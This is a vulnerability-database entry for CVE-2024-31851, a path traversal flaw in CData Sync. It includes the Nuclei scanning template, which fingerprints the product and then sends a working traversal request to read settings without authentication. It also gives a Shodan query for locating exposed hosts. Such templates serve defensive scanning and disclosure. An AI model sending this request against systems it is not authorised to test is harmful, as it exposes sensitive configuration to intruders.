Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-31851
HistoryMay 08, 2024 - 6:21 a.m.

CData Sync < 23.4.8843 - Path Traversal

2024-05-0806:21:40
ProjectDiscovery
github.com
5
cdata sync
cve
cve2024
path traversal
java
embedded jetty
unauthenticated
remote attacker
sensitive information
limited actions

8.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

8.7 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

21.6%

A path traversal vulnerability exists in the Java version of CData Sync &lt; 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
id: CVE-2024-31851

info:
  name: CData Sync < 23.4.8843 - Path Traversal
  author: DhiyaneshDK
  severity: high
  description: |
    A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
  reference:
    - https://www.tenable.com/security/research/tra-2024-09
    - https://nvd.nist.gov/vuln/detail/CVE-2024-31851
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-31851
    cwe-id: CWE-22
    epss-score: 0.00054
    epss-percentile: 0.21518
  metadata:
    verified: true
    max-request: 2
    shodan-query: "title:\"CData Sync\""
  tags: cve,cve2024,cdata,lfi
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}/login.rst'

    matchers:
      - type: word
        internal: true
        words:
          - '<title>CData - Sync'

  - raw:
      - |
        GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"items":[{'
          - ':"true"'
          - 'notifyemail'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210090d4d9de6346bbb09774928cf9feff8c35a86741a0bc5b6e125cb7202cff980502204c5052b55e340d12b6ef19bdb5e3bbd27f725bb837e394805e12ddb092fbc272:922c64590222798bb761d5b6d8e72950

8.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

8.7 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

21.6%

Related for NUCLEI:CVE-2024-31851